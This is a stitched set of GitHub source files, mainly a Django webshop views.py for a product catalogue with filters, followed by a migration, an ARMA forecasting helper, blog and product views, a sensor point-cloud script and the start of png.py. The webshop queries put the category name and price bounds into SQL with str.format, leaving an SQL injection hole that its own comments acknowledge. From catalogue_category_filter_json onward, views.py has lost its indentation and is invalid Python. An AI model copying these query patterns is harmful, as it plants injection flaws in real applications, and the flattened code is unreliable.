            # First sighting of this product: attach its price correctors.
            for corrector in get_correctors_for_product(all_correctors, product[0]):
                price = corrector[2]
                price_new = corrector[2]
                if price is None:
                    # Corrector without its own price falls back to the default.
                    price = product[5]
                    price_new = product[5]
                if product[21] is not None:
                    price_new = price - price / 100 * product[21]
                if product[24] is not None:
                    price_new += price / 100 * product[24]
                products[product[0]]['price_correctors'].append({
                    'id': corrector[0],
                    'name': corrector[3],
                    'price_new': price_new,
                    'price': price})
        # Attach at most one not-yet-seen image (col 14) per outer row.
        for prod in filtered_products:
            if prod[0] == product[0]:
                if prod[14] not in img_ids and prod[14] is not None:
                    img_ids.append(prod[14])
                    products[prod[0]]['images'].append({
                        'id': prod[14],
                        'weight': prod[15],
                        'original': prod[16],
                        'large': prod[17],
                        'medium': prod[18],
                        'small': prod[19]})
                    break
    # Convert the dict to a list of (id, data) pairs in the requested order.
    if order == "price_ASC":
        products = sorted(products.items(), key=lambda x: x[1]['default_price'], reverse=False)
    elif order == "price_DESC":
        products = sorted(products.items(), key=lambda x: x[1]['default_price'], reverse=True)
    elif order == "date_ASC":
        products = sorted(products.items(), key=lambda x: x[1]['date_on_add'], reverse=False)
    elif order == "date_DESC":
        products = sorted(products.items(), key=lambda x: x[1]['date_on_add'], reverse=True)
    elif order == "weight":
        products = sorted(products.items(), key=lambda x: x[1]['weight'], reverse=False)
    else:
        # Unknown sort keys are treated as a bad URL.
        raise Http404('Page not found')
    return products, products_ids
# noinspection SqlResolve
def filter_products(category, values, order: str, product_on_page: str, page: str,
                    price_from: float = None, price_to: float = None):
    """Select the products of *category* matching every selected parameter.

    One sub-select is chained per entry in *values* (AND semantics across
    parameters, OR within one parameter's value list).  Returns the tuple
    (page slice of products, all matching product ids, page count).

    SECURITY NOTE: *category* and the price bounds are interpolated into the
    SQL via str.format rather than bound parameters - callers must pass
    trusted values (the value ids are safe: int()-converted upstream).
    """
    conn = connection
    cur = conn.cursor()
    order_str = "prod.weight"
    if order == "price_ASC":
        order_str = "default_price ASC"
    if order == "price_DESC":
        order_str = "default_price DESC"
    if len(values) == 1:
        query = str.format(
            "SELECT "
            "prod.id AS prod_id, "  # 0
            "prod.name AS product_name, "  # 1
            "prod.code, "  # 2
            "prod.url, "  # 3
            "prod.weight, "  # 4
            "(prod.default_price * prod_providers.coefficient) AS default_price, "  # 5
            "prod.active, "  # 6
            "prod.description, "  # 7
            "prod.mass, "  # 8
            "prod.is_new, "  # 9
            "prod.is_top, "  # 10
            "prod_price_cor.id AS price_cor_id, "  # 11
            "prod_price_cor.name AS price_cor_name, "  # 12
            "(prod_price_cor.new_price * prod_providers.coefficient) AS new_price, "  # 13
            "prod_image.id AS image_id, "  # 14
            "prod_image.weight AS prod_image_weight, "  # 15
            "prod_image.image_original, "  # 16
            "prod_image.image_large, "  # 17
            "prod_image.image_medium, "  # 18
            "prod_image.image_small, "  # 19
            "prod.category_id, "  # 20
            "prod_sales.percent, "  # 21
            "prod_sales.name, "  # 22
            "prod_sales.image, "  # 23
            "prod_margins.percent, "  # 24
            "prod.provider_id AS provider_id, "  # 25
            "prod_sales.id AS sale_id, "  # 26
            "prod_margins.id AS margin_id, "  # 27
            "prod.date_on_add "  # 28
            "FROM products AS prod "
            "JOIN categories AS cat ON cat.id = prod.category_id AND cat.name = '{0}' "
            "JOIN product_parameters_values AS prod_val ON prod_val.product_id = prod.id "
            "AND prod_val.value_id IN {1} "
            "JOIN providers AS prod_providers ON prod.provider_id = prod_providers.id "
            "LEFT JOIN sales AS prod_sales ON prod.sale_id = prod_sales.id "
            "LEFT JOIN margins AS prod_margins ON prod.margin_id = prod_margins.id "
            "LEFT JOIN product_price_correctors AS prod_price_cor ON prod.id = prod_price_cor.product_id "
            "LEFT JOIN product_image_positions AS prod_image ON prod.id = prod_image.product_id "
            "WHERE prod.active AND default_price BETWEEN {3} AND {4} ORDER BY {2}, prod_image.weight",
            category, list_to_sql_array(values[0]['values']), order_str, price_from, price_to)
    else:
        # BUG FIX: the tail of this query used to read
        # "WHERE prod.active ORDER BY {2} AND default_price BETWEEN ...",
        # which folded the price filter into the ORDER BY expression and
        # silently dropped it; it now matches the single-value query above.
        query = str.format(
            "SELECT "
            "prod.id AS prod_id, "  # 0
            "prod.name AS product_name, "  # 1
            "prod.code, "  # 2
            "prod.url, "  # 3
            "prod.weight, "  # 4
            "(prod.default_price * prod_providers.coefficient) AS default_price, "  # 5
            "prod.active, "  # 6
            "prod.description, "  # 7
            "prod.mass, "  # 8
            "prod.is_new, "  # 9
            "prod.is_top, "  # 10
            "prod_price_cor.id AS price_cor_id, "  # 11
            "prod_price_cor.name AS price_cor_name, "  # 12
            "(prod_price_cor.new_price * prod_providers.coefficient) AS new_price, "  # 13
            "prod_image.id AS image_id, "  # 14
            "prod_image.weight AS prod_image_weight, "  # 15
            "prod_image.image_original, "  # 16
            "prod_image.image_large, "  # 17
            "prod_image.image_medium, "  # 18
            "prod_image.image_small, "  # 19
            "prod.category_id, "  # 20
            "prod_sales.percent, "  # 21
            "prod_sales.name, "  # 22
            "prod_sales.image, "  # 23
            "prod_margins.percent AS margin_percent, "  # 24
            "prod.provider_id AS provider_id, "  # 25
            "prod_sales.id AS sale_id, "  # 26
            "prod_margins.id AS margin_id, "  # 27
            "prod.date_on_add "  # 28
            "FROM products AS prod "
            "JOIN categories AS cat ON cat.id = prod.category_id AND cat.name = '{0}' "
            "JOIN product_parameters_values AS prod_val ON prod_val.product_id = prod.id "
            "AND prod_val.value_id IN {1} "
            "JOIN providers AS prod_providers ON prod.provider_id = prod_providers.id "
            "LEFT JOIN sales AS prod_sales ON prod.sale_id = prod_sales.id "
            "LEFT JOIN margins AS prod_margins ON prod.margin_id = prod_margins.id "
            "LEFT JOIN product_price_correctors AS prod_price_cor ON prod.id = prod_price_cor.product_id "
            "LEFT JOIN product_image_positions AS prod_image ON prod.id = prod_image.product_id "
            "WHERE prod.active AND default_price BETWEEN {3} AND {4} ORDER BY {2}, prod_image.weight",
            category, list_to_sql_array(values[0]['values']), order_str, price_from, price_to)
    # Wrap the query once per additional selected parameter so products must
    # match every parameter (AND semantics across parameters).
    for val_id in range(1, len(values)):
        # BUG FIX: same malformed "ORDER BY ... AND ... BETWEEN" tail as above.
        query = str.format(
            "SELECT "
            "prod.prod_id AS prod_id, "  # 0
            "prod.product_name AS product_name, "  # 1
            "prod.code, "  # 2
            "prod.url, "  # 3
            "prod.weight, "  # 4
            "prod.default_price AS default_price, "  # 5
            "prod.active, "  # 6
            "prod.description, "  # 7
            "prod.mass, "  # 8
            "prod.is_new, "  # 9
            "prod.is_top, "  # 10
            "prod.price_cor_id AS price_cor_id, "  # 11
            "prod.price_cor_name AS price_cor_name, "  # 12
            "prod.new_price AS new_price, "  # 13
            "prod_image.id AS image_id, "  # 14
            "prod.prod_image_weight AS prod_image_weight, "  # 15
            "prod_image.image_original, "  # 16
            "prod_image.image_large, "  # 17
            "prod_image.image_medium, "  # 18
            "prod_image.image_small, "  # 19
            "prod.category_id, "  # 20
            "prod_sales.percent, "  # 21
            "prod_sales.name, "  # 22
            "prod_sales.image, "  # 23
            "prod.margin_percent, "  # 24
            "prod.provider_id AS provider_id, "  # 25
            "prod.sale_id AS sale_id, "  # 26
            "prod.margin_id AS margin_id, "  # 27
            "prod.date_on_add "  # 28
            "FROM ({0}) AS prod "
            "JOIN categories AS cat ON cat.id = prod.category_id AND cat.name = '{1}' "
            "JOIN product_parameters_values AS prod_val "
            "ON prod_val.product_id = prod.prod_id AND prod_val.value_id IN {2} "
            "JOIN providers AS prod_providers ON prod.provider_id = prod_providers.id "
            "LEFT JOIN sales AS prod_sales ON prod.sale_id = prod_sales.id "
            "LEFT JOIN margins AS prod_margins ON prod.margin_id = prod_margins.id "
            "LEFT JOIN product_price_correctors AS prod_price_cor ON prod.prod_id = prod_price_cor.product_id "
            "LEFT JOIN product_image_positions AS prod_image ON prod.prod_id = prod_image.product_id "
            "WHERE prod.active AND default_price BETWEEN {4} AND {5} ORDER BY {3}, prod_image.weight", query,
            category, list_to_sql_array(values[val_id]['values']), order_str, price_from, price_to)
    cur.execute(query)
    products_selected = cur.fetchall()
    products, products_ids = get_products(products_selected, order)
    per_page = int(product_on_page)
    # BUG FIX: round() under-counted pages (e.g. 10 items at 20 per page gave
    # 0 pages); use ceiling division instead.
    max_page = -(-len(products) // per_page)
    products = products[(int(page) - 1) * per_page: int(page) * per_page]
    return products, products_ids, max_page
# noinspection SqlResolve
def catalogue_category_filter(request, category: str, order: str = "weight",
                              product_on_page: str = settings.PRODUCT_ON_PAGE,
                              page: str = 1) -> dict:
    """Build the product listing + filter sidebar data for one category page.

    Returns a dict with keys 'products', 'filter', 'max_page', 'price_min'
    and 'price_max'.  (BUG FIX: the annotation previously said ``-> str``;
    the function has always returned a dict.)

    SECURITY NOTE: *category* is interpolated into the larger queries via
    str.format - callers must pass a trusted value.
    """
    conn = connection
    cur = conn.cursor()
    # Overall category price range; used as defaults for the price filter.
    # NOTE(review): both are None for an empty category - presumably every
    # rendered category has products; confirm against callers.
    price_min = cur.execute("SELECT MIN(prod.default_price) "
                            "FROM products as prod "
                            "JOIN categories AS cat "
                            "ON prod.category_id = cat.id AND cat.name = %s", [category]).fetchall()[0][0]
    price_max = cur.execute("SELECT MAX(prod.default_price) "
                            "FROM products as prod "
                            "JOIN categories AS cat "
                            "ON prod.category_id = cat.id AND cat.name = %s", [category]).fetchall()[0][0]
    # Parameter filters selected in the query string (price keys excluded).
    values = get_selected_parameters_values(request)
    if values:
        price_from, price_to = get_price(request)
        if price_from is None:
            price_from = price_min
        if price_to is None:
            price_to = price_max
        products, products_ids, max_page = filter_products(category, values, order, product_on_page, page,
                                                           price_from, price_to)
    else:
        # No parameter filter selected: list the whole category.
        # BUG FIX: this branch previously ran only when request.GET was
        # completely empty, so a request carrying just price_from/price_to
        # crashed inside filter_products with an empty ``values`` list.
        # TODO(review): price_from/price_to are still ignored in this branch.
        cur.execute(
            str.format("SELECT "
                       "prod.id AS prod_id, "  # 0
                       "prod.name AS product_name, "  # 1
                       "prod.code, "  # 2
                       "prod.url, "  # 3
                       "prod.weight, "  # 4
                       "(prod.default_price * prod_providers.coefficient) AS default_price, "  # 5
                       "prod.active, "  # 6
                       "prod.description, "  # 7
                       "prod.mass, "  # 8
                       "prod.is_new, "  # 9
                       "prod.is_top, "  # 10
                       "prod_price_cor.id AS price_cor_id, "  # 11
                       "prod_price_cor.name AS price_cor_name, "  # 12
                       "(prod_price_cor.new_price * prod_providers.coefficient) AS new_price, "  # 13
                       "prod_image.id AS image_id, "  # 14
                       "prod_image.weight AS prod_image_weight, "  # 15
                       "prod_image.image_original, "  # 16
                       "prod_image.image_large, "  # 17
                       "prod_image.image_medium, "  # 18
                       "prod_image.image_small, "  # 19
                       "prod.category_id, "  # 20
                       "prod_sales.percent, "  # 21
                       "prod_sales.name, "  # 22
                       "prod_sales.image, "  # 23
                       "prod_margins.percent, "  # 24
                       "prod.provider_id AS provider_id, "  # 25
                       "prod.sale_id AS sale_id, "  # 26
                       "prod.margin_id AS margin_id, "  # 27
                       "prod.date_on_add "  # 28
                       "FROM products AS prod "
                       "JOIN categories AS cat ON cat.id = prod.category_id AND cat.name = '{0}' "
                       "JOIN providers AS prod_providers ON prod.provider_id = prod_providers.id "
                       "LEFT JOIN sales AS prod_sales ON prod.sale_id = prod_sales.id "
                       "LEFT JOIN margins AS prod_margins ON prod.margin_id = prod_margins.id "
                       "JOIN product_parameters_values AS prod_val ON prod_val.product_id = prod.id "
                       "LEFT JOIN product_price_correctors AS prod_price_cor ON prod.id = prod_price_cor.product_id "
                       "LEFT JOIN product_image_positions AS prod_image ON prod.id = prod_image.product_id "
                       "WHERE prod.active "
                       "ORDER BY prod.weight, prod_image.weight",
                       category))
        # BUG FIX: "AND prod.active" was previously attached to the last
        # LEFT JOIN's ON clause, so inactive products were not filtered out;
        # it is now a proper WHERE clause, matching the filtered branch.
        products_selected = cur.fetchall()
        products, products_ids = get_products(products_selected, order)
        per_page = int(product_on_page)
        # BUG FIX: round() under-counted pages; use ceiling division.
        max_page = -(-len(products) // per_page)
        products = products[(int(page) - 1) * per_page: int(page) * per_page]
    # Fetch the parameter/value rows for the sidebar; when products matched,
    # per-value counts are restricted to those products.
    if products_ids:
        cur.execute(
            str.format("SELECT "
                       "prod_par.id, "  # 0
                       "prod_par.name, "  # 1
                       "prod_par.first_image, "  # 2
                       "prod_par.second_image, "  # 3
                       "prod_par.weight, "  # 4
                       "val.id AS val_id, "  # 5
                       "val.value, "  # 6
                       "val.first_image AS val_first_image, "  # 7
                       "val.second_image AS val_second_image, "  # 8
                       "val.weight AS val_weight, "  # 9
                       "(SELECT COUNT(id) FROM product_parameters_values "
                       "AS ppv WHERE val.id = ppv.value_id AND ppv.product_id IN {1}) AS count"  # 10
                       " FROM product_parameters AS prod_par JOIN product_parameters_available_value AS val ON "
                       "val.product_parameter_id = prod_par.id JOIN categories AS cat ON cat.id = prod_par.category_id "
                       "AND cat.name = '{0}' "
                       "LEFT JOIN product_parameters_values AS prod_param_val "
                       "ON val.id = prod_param_val.value_id "
                       "GROUP BY prod_par.id, val.id "
                       "ORDER BY prod_par.weight ASC, val.weight ASC", category, list_to_sql_array(products_ids)))
    else:
        cur.execute(
            str.format("SELECT "
                       "prod_par.id, "  # 0
                       "prod_par.name, "  # 1
                       "prod_par.first_image, "  # 2
                       "prod_par.second_image, "  # 3
                       "prod_par.weight, "  # 4
                       "val.id AS val_id, "  # 5
                       "val.value, "  # 6
                       "val.first_image AS val_first_image, "  # 7
                       "val.second_image AS val_second_image, "  # 8
                       "val.weight AS val_weight, "  # 9
                       "(SELECT COUNT(id) FROM product_parameters_values "
                       "AS ppv WHERE val.id = ppv.value_id) "  # 10
                       " FROM product_parameters AS prod_par JOIN product_parameters_available_value AS val ON "
                       "val.product_parameter_id = prod_par.id JOIN categories AS cat ON cat.id = prod_par.category_id "
                       "AND cat.name = '{0}' "
                       "LEFT JOIN product_parameters_values AS prod_param_val "
                       "ON val.id = prod_param_val.value_id "
                       "GROUP BY prod_par.id, val.id "
                       "ORDER BY prod_par.weight ASC, val.weight ASC", category))
    parameters = cur.fetchall()
    return {'products': products, 'filter': get_filter_from_query(values, parameters),
            'max_page': max_page, 'price_min': price_min, 'price_max': price_max}
def catalogue_category_filter_json(request, category: str, order: str = "weight",
product_on_page: str = settings.PRODUCT_ON_PAGE,
page: str = 1):
contents = catalogue_category_filter(request, category, order, product_on_page, page)
products_data = []
products = contents['products']
for key, product in products:
correctors_data = []
correctors = product['price_correctors']
if correctors:
for corrector in correctors:
correctors_data.append({
'id': corrector['id'],
'data': {
'name': corrector['name'],
'price': corrector['price'],
'price_new': corrector['price_new'],
},
})
images_data = []
images = product['images']
if images:
for image in images:
images_data.append({
'id': image['id'],
'data': {
'original': image['original'],
'large': image['large'],
'medium': image['medium'],
'small': image['small'],
'weight': image['weight'],
},
})
products_data.append({
'id': key,
'data': {
'name': product['name'],
'code': product['code'],
'url': product['url'],
'weight': product['weight'],
'default_new_price': product['default_new_price'],
'default_price': product['default_price'],
'description': product['description'],
'mass': product['mass'],
'is_new': product['is_new'],
'is_top': product['is_top'],
'images': images_data,
'price_correctors': correctors_data,
'sale_name': product['sale_name'],
'sale_image': product['sale_image'],
'date_on_add': product['date_on_add'],
},
})
contents_data = {
'products': products_data,
'max_page': contents['max_page'],
'price_max': contents['price_max'],
'price_min': contents['price_min'],
'filter': contents['filter'],
}
return JsonResponse(contents_data, charset='utf-8')
def catalogue_category(request, category: str, order: str = "weight", product_on_page: str = settings.PRODUCT_ON_PAGE,
page: str = 1):
if page is None:
page = 1
if product_on_page is None:
product_on_page = settings.PRODUCT_ON_PAGE
if order is None:
order = "weight"
try:
category = Category.objects.get(url=category)
except Exception:
raise Http404('Page not found')
template = category.template.path
return render(request, template, {'category': category})
def catalogue_prefilter(request, category: str, name: str):
try:
prefilter = PreFilter.objects.get(url=name)
except Exception:
raise Http404('Page not found')
original_url = prefilter.original_url
request = RequestFactory().get(prefilter.original_url)
beg_pos = str.format('/catalogue/{0}/', category).__len__()
template = prefilter.template.path
try:
end_pos = original_url.index('/?', beg_pos)
order = original_url[beg_pos:end_pos]
return render(request, template, {'prefilter': prefilter})
except ValueError:
products = catalogue_category_filter(request, category)
return render(request, template, {'prefilter': prefilter})
| StepanPilchyck/FrankieWebPlatform | webshop/views.py | views.py | py | 27,826 | python | en | code | 0 | github-code | 13 |
36078288209 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('commerce', '0007_auto_20151130_1638'),
]
operations = [
migrations.CreateModel(
name='EmployeeSkill',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('expereince', models.IntegerField(default=1)),
('customerOrder', models.ForeignKey(to='commerce.Employee', related_name='employeeSkills')),
],
),
migrations.CreateModel(
name='Skill',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(blank=True, max_length=30)),
],
),
migrations.AddField(
model_name='employeeskill',
name='product',
field=models.ForeignKey(to='commerce.Skill'),
),
]
| oreon/gencomm | commerce/migrations/0008_auto_20151211_1913.py | 0008_auto_20151211_1913.py | py | 1,108 | python | en | code | 1 | github-code | 13 |
1976490981 |
import pandas as pd
import numpy as np
from sklearn.metrics import mean_squared_error
from functions.ols import OLS
def ARMA(df,p,q):
"""
Perform an AutoRegressive Moving Average (ARMA) analysis on a time series DataFrame.
Args:
df (pandas.DataFrame): A DataFrame containing a time series with a column named 'AverageTemperature'.
p (int): The order of the AutoRegressive (AR) model.
q (int): The order of the Moving Average (MA) model.
Returns:
list: A list containing the following items:
1. pandas.DataFrame: A DataFrame with additional columns, including 'Predicted_Values',
representing the ARMA model predictions.
2. float: Mean Squared Error (MSE) of the ARMA model on the testing data.
3. float: Root Mean Squared Error (RMSE) of the ARMA model on the testing data.
This function performs an ARMA analysis on a given time series data, consisting of AR (AutoRegressive) and
MA (Moving Average) modeling. It first extracts the AR component by fitting a linear regression model
to the lagged values of the 'AverageTemperature' series. Then, it calculates the residuals and uses them
for fitting the MA component with another linear regression model. Finally, it combines the AR and MA
components to generate predictions for the entire time series and returns the resulting DataFrame,
along with MSE and RMSE as evaluation metrics.
Note:
- The function assumes that the input DataFrame 'df' contains a column named 'AverageTemperature'.
- The input 'p' and 'q' are positive integers specifying the orders of the AR and MA models, respectively.
- The training-testing split is performed using an 80-20 ratio.
- Linear regression models are used for parameter estimation.
"""
#AR part
# Copy the input DataFrame to avoid modifying the original data
df_temp = df.copy()
# Generate the lagged p terms
for i in range(1, p + 1):
df_temp['Shifted_values_%d' % i] = df_temp['AverageTemperature'].shift(i)
# Determine the size of the training set (80% of the data)
train_size = (int)(0.8 * df_temp.shape[0])
# Split the data into training and testing sets
df_train = pd.DataFrame(df_temp[0:train_size])
df_test = pd.DataFrame(df_temp[train_size:df.shape[0]])
# Remove rows with missing values in the training set
df_train_2 = df_train.dropna()
# Extract lagged features (X) and target variable (y) for training
X_train = df_train_2.iloc[:, 1:].values.reshape(-1, p)
y_train = df_train_2.iloc[:, 0].values.reshape(-1, 1)
# Apply linear regression to estimate AR model coefficients
ols_ar = OLS()
ols_ar.fit(X_train, y_train)
# Generate predictions for the training set
df_train_2 = df_train_2.copy()
df_train_2['Predicted_Values'] = ols_ar.predict(X_train)
# Prepare lagged features for the testing set
X_test = df_test.iloc[:, 1:].values.reshape(-1, p)
# Generate predictions for the testing set
df_test = df_test.copy()
df_test['Predicted_Values'] = ols_ar.predict(X_test)
# Concatenate training and testing data for residuals calculation
df_ar = pd.concat([df_train_2, df_test])
# Calculate residuals
res = pd.DataFrame()
res['Residuals'] = df_ar['AverageTemperature'] - df_ar['Predicted_Values']
# Generate lagged residuals as features
for i in range(1, q + 1):
res['Shifted_values_%d' % i] = res['Residuals'].shift(i)
# Determine the size of the training set (80% of the data)
train_size = (int)(0.8 * res.shape[0])
# Split the data into training and testing sets
res_train = pd.DataFrame(res[0:train_size])
res_test = pd.DataFrame(res[train_size:res.shape[0]])
# Remove rows with missing values in the training set
res_train_2 = res_train.dropna()
# Extract lagged residuals (X) and residuals (y) for training
X_train = res_train_2.iloc[:, 1:].values.reshape(-1, q)
y_train = res_train_2.iloc[:, 0].values.reshape(-1, 1)
# Apply linear regression to estimate MA model coefficients
ols_ma = OLS()
ols_ma.fit(X_train, y_train)
# Generate predictions for the training set
res_train_2 = res_train_2.copy()
res_train_2['Predicted_Values'] = ols_ma.predict(X_train)
# Prepare lagged residuals for the testing set
X_test = res_test.iloc[:, 1:].values.reshape(-1, q)
# Generate predictions for the testing set
res_test = res_test.copy()
res_test['Predicted_Values'] = ols_ma.predict(X_test)
# Calculate RMSE and MSE to evaluate model performance
MSE = mean_squared_error(res_test['Residuals'], res_test['Predicted_Values'])
RMSE = np.sqrt(MSE)
# # Print RMSE and order of the MA model
# print("The MSE is :", MSE,", Value of p : ",p, "Value of q :",q)
# print("The RMSE is :", RMSE,", Value of p : ",p, "Value of q :",q)
# Pediction
res_c = pd.concat([res_train_2,res_test])
# Adding the predicted data from res to the AR part (ARMA)
df_ar.Predicted_Values += res_c.Predicted_Values
return [df_ar,MSE,RMSE] | CyberStefNef/World_Temperature_Analysis | functions/arma.py | arma.py | py | 5,195 | python | en | code | 0 | github-code | 13 |
42545564770 | from django.shortcuts import render, redirect
from django.contrib import messages
from .models import Blog
# Create your views here.
def index(request):
context = {
'bloggers': Blog.objects.all()
}
return render(request, 'index.html', context)
# def update(request, id):
# # pass the post data to the method we wrote and save the response in a variable called errors
# errors = Blog.objects.basic_validator(request.POST)
# # check if the errors dictionary has anything in it
# if len(errors) > 0:
# # if the errors dictionary contains anything, loop through each key-value pair and make a flash message
# for key, value in errors.items():
# messages.error(request, value)
# # redirect the user back to the form to fix the errors
# return redirect('/blog/edit/'+id)
# else:
# # if the errors object is empty, that means there were no errors!
# # retrieve the blog to be updated, make the changes, and save
# blog = Blog.objects.get(id = id)
# blog.name = request.POST['name']
# blog.desc = request.POST['desc']
# blog.save()
# messages.success(request, "Blog successfully updated")
# # redirect to a success route
# return redirect('/blogs')
def new_blogger(request):
new_blogger = Blog.objects.create(
name = request.POST['name'],
desc = request.POST['desc']
)
return redirect('/') | KeithBrantley/Coding_Dojo | python_stack/django/django_full_stack/blog/main/views.py | views.py | py | 1,474 | python | en | code | 1 | github-code | 13 |
11569671201 | class Allergies:
def __init__(self, score):
self._items = {
1: 'eggs',
2: 'peanuts',
4: 'shellfish',
8: 'strawberries',
16: 'tomatoes',
32: 'chocolate',
64: 'pollen',
128: 'cats',
}
self._score = score % 256
def allergic_to(self, item):
return item in self.lst
@property
def lst(self):
allergies = list()
score = self._score
for key in sorted(self._items.keys(), reverse=True):
if score >= key:
score -= key
allergies.append(self._items[key])
if score == 0:
break
return allergies
| ikostan/Exercism_Python_Track | allergies/allergies.py | allergies.py | py | 742 | python | en | code | 0 | github-code | 13 |
26864521725 | import os
import sys
file_dir_path = os.path.dirname(os.path.realpath(__file__))
# add code directory to path
sys.path.append(file_dir_path + '/../../')
from sensor.optimization_angles_general import brute_optimize, plot_print_length, save_distances, \
save_3d_distances
description = "270_blk_dot_mid_floor"
path_img_conf = file_dir_path + "/../../experiments/270deg_partial"
# Brute force optimize -------------------------------------------------------------------------------------------------
images_brute_optimize = [6, 13]
flip_xy_on_ols = True
use_erosion_and_dilation = True
threshold = 50
ranges_cam_laser_FOV = rclf = ((-20, 20), (-20, 20), (43, 55))
file_name_optimize = f'image_{images_brute_optimize}_' \
f'cam_{rclf[0][0]}_{rclf[0][1]}_' \
f'laser_{rclf[1][0]}_{rclf[1][1]}_' \
f'FOV_{rclf[2][0]}_{rclf[2][1]}_' \
f'flip_xy_on_ols_{flip_xy_on_ols}_' \
f'use_erosion_and_dilation_{use_erosion_and_dilation}'
file_name_optimize = file_dir_path + \
'/results/' + \
file_name_optimize \
.replace('[', '_') \
.replace(']', '_') \
.replace(',', '_') \
.replace(' ', '_')
# show_images(path_img_conf, images_brute_optimize, threshold)
if not os.path.exists(file_name_optimize + '.npy'):
print('Starting optimization')
brute_optimize(path_img_conf,
images_brute_optimize,
flip_xy_on_ols=True,
use_erosion_and_dilation=use_erosion_and_dilation,
threshold=threshold,
output_file_name=file_name_optimize,
ranges_cam_laser_FOV=ranges_cam_laser_FOV)
# Eo brute force optimize
# Find best initial parameters -----------------------------------------------------------------------------------------
fov, cam_angle_offset, laser_angle_offset = plot_print_length(file_name_optimize + '.npy',
path_img_conf, length_to_vertical_wall=2380,
do_plot=False)
# EO find best initial parameters
# Calculate and save distances -----------------------------------------------------------------------------------------
filename_2d_ang = 'results/' + \
f'dist_2d_single_path_threshold_{threshold}' \
f'_erosion_dilution_{use_erosion_and_dilation}' \
f'_{description}.npy'
filename_3d_ang = 'results/' + \
f'dist_3_single_path_threshold_{threshold}' \
f'_erosion_dilution_{use_erosion_and_dilation}' \
f'_{description}.npy'
# Calculate and save distances, x, z, rot z (2d + z angle)
if not os.path.exists(filename_2d_ang):
save_distances(path_img_conf, filename_2d_ang, fov=fov, cam_angle_offset=cam_angle_offset,
laser_angle_offset=laser_angle_offset,
threshold=threshold, use_erosion_and_dilation=use_erosion_and_dilation,
limit_estimated_angle_to_field_of_view=37)
# Calculate and save distances, x, y, z
if not os.path.exists(filename_3d_ang):
# Only distances in the range of the filter will be included in the point cloud
xyz_filter = [[-10000, 3000], [-3500, 3500], [-1000, 3500]]
save_3d_distances(filename_2d_ang, filename_3d_ang, xyz_filter)
# EO calculate and save distances
# # View point cloud -----------------------------------------------------------------------------------------------------
# val = np.load(filename_3d_ang)
# v = pptk.viewer(val, val[:, 2])
# v.set(point_size=2)
# v.wait()
# # EO view point cloud
| sensorPointCloud/pointCloudFromImage | results/fine_step_z_270_deg_partial/generate_point_cloud.py | generate_point_cloud.py | py | 3,820 | python | en | code | 1 | github-code | 13 |
28880491199 | from django.http import JsonResponse
from django.shortcuts import render, redirect, get_object_or_404
from django.urls import reverse
from django.views.decorators.http import require_POST
from .models import Product
from accounts.models import Account
def products_list(request):
queryset = Product.objects.all()
context = {
"products": queryset,
}
return render(request, "products/home.html", context=context)
@require_POST
def amount_ajax(request):
pk = request.POST.get("pk")
status = request.POST.get("status")
product = get_object_or_404(Product, pk=pk)
if status == "plus":
product.amount += 1
else:
if product.amount > 0:
product.amount -= 1
else:
redirect("products_list")
product.save()
ctx = {
"amount": product.amount,
}
return JsonResponse(ctx)
def product_register(request):
queryset = Account.objects.all()
context = {
"accounts": queryset,
}
# GET
if request.method == "GET":
return render(request, "products/register.html", context=context)
# POST
title = request.POST["title"]
image = request.FILES["image"]
content = request.POST["content"]
price = request.POST["price"]
amount = request.POST["amount"]
account = Account.objects.get(id=request.POST["account"])
product = Product.objects.create(
title=title,
image=image,
content=content,
price=price,
amount=amount,
account=account,
)
print(product.image)
pk = product.id
url = reverse("products:product_details", kwargs={"pk": pk})
return redirect(to=url)
def product_details(request, pk):
product = Product.objects.get(id=pk)
account = Account.objects.get(id=product.account.pk)
context = {
"product": product,
"account": account,
}
return render(request, "products/details.html", context=context)
def product_update(request, pk):
product = Product.objects.get(id=pk)
accounts = Account.objects.all()
# GET
if request.method == "GET":
context = {
"product": product,
"accounts": accounts,
}
return render(request, "products/update.html", context=context)
# POST
title = request.POST["title"]
try:
image = request.FILES["image"]
except:
image = product.image
content = request.POST["content"]
price = request.POST["price"]
amount = request.POST["amount"]
account = Account.objects.get(id=request.POST["account"])
print(account.name)
product.title = title
product.image = image
product.content = content
product.price = price
product.amount = amount
product.account = account
product.save()
url = reverse("products:product_details", kwargs={"pk": pk})
return redirect(to=url)
def product_delete(request, pk):
product = Product.objects.get(id=pk)
product.delete()
url = reverse("products:products_list")
return redirect(to=url)
| w00ing/piro13_inventory_management | inventory_management/products/views.py | views.py | py | 3,077 | python | en | code | 0 | github-code | 13 |
43347738913 | #!/usr/bin/env python
from __future__ import print_function
# png.py - PNG encoder/decoder in pure Python
#
# Copyright (C) 2006 Johann C. Rocholl <johann@browsershots.org>
# Portions Copyright (C) 2009 David Jones <drj@pobox.com>
# And probably portions Copyright (C) 2006 Nicko van Someren <nicko@nicko.org>
#
# Original concept by Johann C. Rocholl.
#
# LICENCE (MIT)
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Pure Python PNG Reader/Writer
This Python module implements support for PNG images (see PNG
specification at http://www.w3.org/TR/2003/REC-PNG-20031110/ ). It reads
and writes PNG files with all allowable bit depths
(1/2/4/8/16/24/32/48/64 bits per pixel) and colour combinations:
greyscale (1/2/4/8/16 bit); RGB, RGBA, LA (greyscale with alpha) with
